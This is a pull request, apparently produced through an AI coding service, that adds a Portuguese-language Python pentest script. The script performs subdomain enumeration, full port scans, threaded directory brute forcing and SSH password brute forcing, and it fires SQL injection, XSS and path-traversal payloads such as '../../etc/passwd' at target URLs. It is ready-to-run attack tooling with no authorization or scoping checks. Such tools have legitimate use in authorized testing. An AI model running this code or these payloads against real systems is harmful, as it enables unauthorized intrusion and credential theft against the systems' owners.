### PR TITLE
Add advanced pentest framework

### DIFF
--- a/pentest.py
+++ b/pentest.py
@@ -1,0 +1,357 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+Framework Completo de Pentest em Python
+Tudo em Português, pronto para uso, com animações ASCII aprimoradas!
+"""
+import os
+import sys
+import threading
+import queue
+import json
+import logging
+import argparse
+import requests
+import nmap
+import paramiko
+import time
+from dotenv import load_dotenv
+from requests.exceptions import RequestException
+from nmap import PortScanner, PortScannerError
+from paramiko import SSHException, AuthenticationException, BadHostKeyException
+from socket import error as SocketError
+
+# ---------------------- ANIMAÇÃO ASCII APRIMORADA ----------------------
+def animacao_inicial():
+    """Mostra barra de progresso e spinner em ASCII enquanto inicializa."""
+    barras = 30
+    spinner = ['|', '/', '-', '\\']
+    for i in range(barras + 1):
+        porcento = int((i / barras) * 100)
+        barra_atual = '=' * i + ' ' * (barras - i)
+        frame = f"[{barra_atual}] {porcento:3d}% {spinner[i % len(spinner)]}"
+        sys.stdout.write(f"\r{frame}")
+        sys.stdout.flush()
+        time.sleep(0.05)
+    sys.stdout.write("\r[==============================] 100% Concluído!\n")
+    sys.stdout.write("Iniciando o Pentest...\n\n")
+# ---------------------------------------------------------------------
+
+# Carregar variáveis de ambiente/configuração
+load_dotenv()
+ALVO = os.getenv('ALVO') or ''
+THREADS = int(os.getenv('THREADS', 10))
+DIRETORIO_WORDLIST = os.getenv('WORDLIST_DIR', './wordlists')
+DIRETORIO_RELATORIOS = os.getenv('OUTPUT_DIR', './relatorios')
+TIMEOUT = int(os.getenv('TIMEOUT', 5))
+
+
+def configurar_logs():
+    """Configura logs para arquivo e console."""
+    if not os.path.exists(DIRETORIO_RELATORIOS):
+        os.makedirs(DIRETORIO_RELATORIOS)
+
+    logging.basicConfig(
+        level=logging.INFO,
+        format='%(asctime)s [%(levelname)s] %(message)s',
+        handlers=[
+            logging.FileHandler(os.path.join(DIRETORIO_RELATORIOS, 'pentest.log')),
+            logging.StreamHandler(sys.stdout),
+        ]
+    )
+
+
+def enumerar_subdominios(dominio):
+    """Enumera subdomínios via JSON do crt.sh."""
+    logging.info(f"[Rede] Enumerando subdomínios de {dominio}")
+    url = f"https://crt.sh/?q=%25.{dominio}&output=json"
+    subs = []
+    try:
+        r = requests.get(url, timeout=TIMEOUT)
+        r.raise_for_status()
+        dados = r.json()
+        subs = sorted({entry['name_value'] for entry in dados})
+        logging.info(f"[Rede] Encontrados {len(subs)} subdomínios")
+    except RequestException as e:
+        logging.error(f"Falha ao enumerar subdomínios: {e}")
+    return subs
+
+
+def escanear_portas(alvos):
+    """Escaneia portas TCP de 1 a 65535."""
+    scanner = PortScanner()
+    resultados = {}
+
+    for host in alvos:
+        logging.info(f"[Scan] Iniciando varredura de {host}")
+        try:
+            dados = scanner.scan(hosts=host, arguments='-Pn -sT -p1-65535 --open')
+            portas_abertas = list(dados['scan'][host]['tcp'].keys())
+            resultados[host] = portas_abertas
+            logging.info(f"[Scan] {host} portas abertas: {portas_abertas}")
+        except PortScannerError as e:
+            logging.error(f"Erro no scan de {host}: {e}")
+    return resultados
+
+
+def brute_force_diretorio_host(host, wordlist):
+    encontrados = []
+    logging.info(f"[Brute] Iniciando brute force em {host}")
+    try:
+        with open(wordlist, encoding='utf-8') as wl:
+            for linha in wl:
+                caminho = linha.strip()
+                url = f"http://{host}/{caminho}"
+                try:
+                    r = requests.get(url, timeout=TIMEOUT)
+                    if r.status_code in (200, 301, 302):
+                        encontrados.append({'caminho': caminho, 'codigo': r.status_code})
+                        logging.info(f"[Brute] Encontrado: {url} [{r.status_code}]")
+                except RequestException:
+                    continue
+    except IOError as e:
+        logging.error(f"Falha ao abrir wordlist: {e}")
+    return encontrados
+
+
+def brute_force_diretorios(alvos, wordlist):
+    resultados = {}
+    fila = queue.Queue()
+    lock = threading.Lock()
+
+    for host in alvos:
+        fila.put(host)
+
+    def worker():
+        while True:
+            try:
+                alvo = fila.get_nowait()
+            except queue.Empty:
+                break
+            achados = brute_force_diretorio_host(alvo, wordlist)
+            with lock:
+                resultados[alvo] = achados
+            fila.task_done()
+
+    threads = []
+    for _ in range(min(THREADS, fila.qsize())):
+        t = threading.Thread(target=worker)
+        t.start()
+        threads.append(t)
+    fila.join()
+    for t in threads:
+        t.join()
+    return resultados
+
+
+def testar_sql_injection(url, parametro='id'):
+    """Teste expandido de SQLi."""
+    logging.info(f"[Vuln] Testando SQLi em {url} ({parametro})")
+    payloads = [
+        "1' OR '1'='1' -- ",
+        "1 OR 1=1",
+        "' OR SLEEP(5)--",
+        "1); WAITFOR DELAY '0:0:5';--"
+    ]
+    vulneravel = None
+    for payload in payloads:
+        inicio = time.time()
+        try:
+            r = requests.get(url, params={parametro: payload}, timeout=TIMEOUT+5)
+            duracao = time.time() - inicio
+            if any(term in r.text.lower() for term in ('syntax', 'sql', 'mysql', 'odbc')):
+                vulneravel = {'payload': payload, 'url': r.url, 'evidencia': r.text[:200]}
+                break
+            if duracao > TIMEOUT + 4:
+                vulneravel = {'payload': payload, 'url': r.url, 'evidencia': 'Resposta demorou'}
+                break
+        except RequestException:
+            continue
+    if vulneravel:
+        logging.warning(f"[Vuln] Possível SQLi: {vulneravel['url']}")
+    return vulneravel
+
+
+def verificar_xss(url, parametro='q'):
+    """Testa XSS refletido."""
+    logging.info(f"[Vuln] Testando XSS em {url} ({parametro})")
+    payloads = [
+        '<script>alert(1)</script>',
+        '"<img src=x onerror=alert(1)>',
+        "'<svg/onload=alert(1)>"
+    ]
+    for payload in payloads:
+        try:
+            r = requests.get(url, params={parametro: payload}, timeout=TIMEOUT)
+            if payload in r.text:
+                logging.warning(f"[Vuln] Possível XSS: {r.url}")
+                return {'payload': payload, 'url': r.url}
+        except RequestException:
+            continue
+    return None
+
+
+def verificar_lfi(url, parametro='file'):
+    """Testa Local File Inclusion."""
+    logging.info(f"[Vuln] Testando LFI em {url} ({parametro})")
+    payloads = ['../../../../etc/passwd', '..\\..\\..\\..\\windows\\win.ini']
+    for payload in payloads:
+        try:
+            r = requests.get(url, params={parametro: payload}, timeout=TIMEOUT)
+            if 'root:x:' in r.text or '[extensions]' in r.text.lower():
+                logging.warning(f"[Vuln] Possível LFI: {r.url}")
+                return {'payload': payload, 'url': r.url}
+        except RequestException:
+            continue
+    return None
+
+
+def brute_force_ssh(host, credenciais):
+    """Brute force de SSH usando credenciais padrão."""
+    logging.info(f"[Brute] Forçando SSH em {host}")
+    encontrados = []
+    try:
+        with open(credenciais, encoding='utf-8') as cf:
+            for linha in cf:
+                usuario, senha = linha.strip().split(':', 1)
+                try:
+                    ssh = paramiko.SSHClient()
+                    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+                    ssh.connect(host, username=usuario, password=senha, timeout=TIMEOUT)
+                    encontrados.append({'usuario': usuario, 'senha': senha})
+                    logging.warning(f"[Brute] SSH válido: {usuario}:{senha}")
+                    ssh.close()
+                    break
+                except (AuthenticationException, SSHException, BadHostKeyException, SocketError):
+                    continue
+    except IOError as e:
+        logging.error(f"Falha ao abrir credenciais: {e}")
+    return encontrados
+
+
+def gerar_relatorio(resultados):
+    """Gera relatório final em Markdown."""
+    logging.info("[Relatório] Gerando relatório final")
+    linhas = ["# Relatório de Pentest", ""]
+
+    subs = resultados.get('subdominios')
+    if subs is not None:
+        linhas.append("## Subdomínios Encontrados")
+        for s in subs:
+            linhas.append(f"- {s}")
+        linhas.append("")
+
+    portas = resultados.get('portas')
+    if portas is not None:
+        linhas.append("## Portas Abertas")
+        for host, ps in portas.items():
+            portas_str = ', '.join(map(str, ps)) if ps else 'Nenhuma'
+            linhas.append(f"- **{host}**: {portas_str}")
+        linhas.append("")
+
+    dirs = resultados.get('dirs')
+    if dirs is not None:
+        linhas.append("## Diretórios Encontrados")
+        for host, itens in dirs.items():
+            linhas.append(f"### {host}")
+            if itens:
+                for item in itens:
+                    linhas.append(f"- {item['caminho']} [{item['codigo']}]")
+            else:
+                linhas.append("Nenhum diretório encontrado.")
+            linhas.append("")
+
+    ssh_info = resultados.get('ssh')
+    if ssh_info is not None:
+        linhas.append("## Credenciais SSH Válidas")
+        if ssh_info:
+            for item in ssh_info:
+                linhas.append(f"- {item['usuario']}:{item['senha']}")
+        else:
+            linhas.append("Nenhuma credencial válida encontrada.")
+        linhas.append("")
+
+    vulns = resultados.get('vulnerabilidades')
+    if vulns:
+        linhas.append("## Vulnerabilidades Detectadas")
+        for v in vulns:
+            if 'sqli' in v:
+                d = v['sqli']
+                linhas.append(f"### SQL Injection\nPayload: `{d['payload']}`\nURL: {d['url']}\n")
+            if 'xss' in v:
+                d = v['xss']
+                linhas.append(f"### Cross-Site Scripting\nPayload: `{d['payload']}`\nURL: {d['url']}\n")
+            if 'lfi' in v:
+                d = v['lfi']
+                linhas.append(f"### Local File Inclusion\nPayload: `{d['payload']}`\nURL: {d['url']}\n")
+        linhas.append("")
+
+    with open(os.path.join(DIRETORIO_RELATORIOS, 'relatorio_final.md'), 'w', encoding='utf-8') as f:
+        f.write('\n'.join(linhas))
+    logging.info("[Relatório] Relatório final criado")
+
+
+def main():
+    animacao_inicial()
+    parser = argparse.ArgumentParser(
+        description='Framework Completo de Pentest em Python'
+    )
+    parser.add_argument('-t', '--target', help='Alvo principal')
+    parser.add_argument('--subdominios', action='store_true', help='Enumera subdomínios via crt.sh')
+    parser.add_argument('--portas', action='store_true', help='Escaneia portas TCP (1-65535)')
+    parser.add_argument('--dirs', action='store_true', help='Brute force de diretórios')
+    parser.add_argument('--sqli-url', help='URL para teste de SQL Injection')
+    parser.add_argument('--sqli-param', default='id', help='Parâmetro vulnerável para SQLi')
+    parser.add_argument('--ssh', action='store_true', help='Brute force SSH')
+    parser.add_argument('--xss-url', help='URL para teste de XSS')
+    parser.add_argument('--xss-param', default='q', help='Parâmetro vulnerável para XSS')
+    parser.add_argument('--lfi-url', help='URL para teste de LFI')
+    parser.add_argument('--lfi-param', default='file', help='Parâmetro vulnerável para LFI')
+    parser.add_argument('--wordlist-dirs', help='Wordlist de diretórios', default=os.path.join(DIRETORIO_WORDLIST, 'common.txt'))
+    parser.add_argument('--wordlist-creds', help='Wordlist de credenciais SSH', default=os.path.join(DIRETORIO_WORDLIST, 'ssh_creds.txt'))
+    args = parser.parse_args()
+
+    configurar_logs()
+
+    alvo_principal = args.target or ALVO
+    if not alvo_principal:
+        parser.error('É necessário especificar o alvo principal via -t ou variável de ambiente ALVO')
+
+    resultados = {}
+    alvos = [alvo_principal]
+
+    if args.subdominios:
+        subs = enumerar_subdominios(alvo_principal)
+        resultados['subdominios'] = subs
+        alvos.extend(subs)
+
+    if args.portas:
+        resultados['portas'] = escanear_portas(alvos)
+
+    if args.dirs:
+        resultados['dirs'] = brute_force_diretorios(alvos, args.wordlist_dirs)
+
+    vulns = []
+    if args.sqli_url:
+        res = testar_sql_injection(args.sqli_url, args.sqli_param)
+        if res:
+            vulns.append({'sqli': res})
+    if args.xss_url:
+        res = verificar_xss(args.xss_url, args.xss_param)
+        if res:
+            vulns.append({'xss': res})
+    if args.lfi_url:
+        res = verificar_lfi(args.lfi_url, args.lfi_param)
+        if res:
+            vulns.append({'lfi': res})
+    if vulns:
+        resultados['vulnerabilidades'] = vulns
+
+    if args.ssh:
+        resultados['ssh'] = brute_force_ssh(alvo_principal, args.wordlist_creds)
+
+    gerar_relatorio(resultados)
+
+
+if __name__ == '__main__':
+    main()


### PR DESCRIPTION
## Summary
- implement pentest framework with improved workflow
- add CLI options for specifying target and wordlists
- include XSS and LFI checks
- enhance SQL injection tester
- brute force directories against multiple hosts with threads
- create Markdown report summarizing results

## Testing
- `python3 -m py_compile pentest.py`
- `python3 pentest.py --help | head -n 40`


------
https://chatgpt.com/codex/tasks/task_e_6848355ecb4083249a98d1644f260628